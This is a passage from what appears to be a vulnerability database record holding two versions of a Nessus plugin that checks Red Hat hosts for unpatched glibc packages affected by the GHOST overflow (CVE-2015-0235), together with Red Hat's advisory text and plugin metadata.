RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/12/27 10:05:36\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 12, "lastseen": "2019-01-16T20:20:46"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "609406179779e5ce50180d1319f9b120d86e033bb10e58ffada9b7a7439e2f2d", "hashmap": [{"hash": "5f51513fe342d0d876d5e6133b2e7d91", "key": "sourceData"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "7c03779312ffcb90b2c1d0c697a916c4", "key": "modified"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-07-30T14:05:51", "modified": "2018-07-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if 